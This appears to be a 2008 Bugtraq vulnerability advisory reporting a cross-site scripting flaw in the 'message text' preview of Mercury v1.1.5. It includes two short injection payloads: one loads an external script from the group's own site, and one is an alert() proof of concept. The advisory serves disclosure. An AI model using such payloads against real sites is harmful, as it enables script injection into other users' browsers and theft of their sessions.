
Date: 10 Feb 2008 22:25:57 -0000
From: No-reply@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Mercury v1.1.5 Send Message Cross-Site Scripting

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
---------------------------------------------
Greetz: Aura, imm02tal, iM4n, Mormoroth,
Mercury v1.1.5 Send Message Cross-Site Scripting

In order to make this vuln work you need to place your code in the "message text" area and press preview   


Examples:
<script src=http://Aria-Security.net/test.js></script>
<script>alert('Aria-Security Team')</script>

Regards,
The-0utl4w
Aria-Security.Net
(Credits Goes To Aria-Security Team)

----------------------------
More Info @ http://forum.aria-security.net/forumdisplay.php?f=60
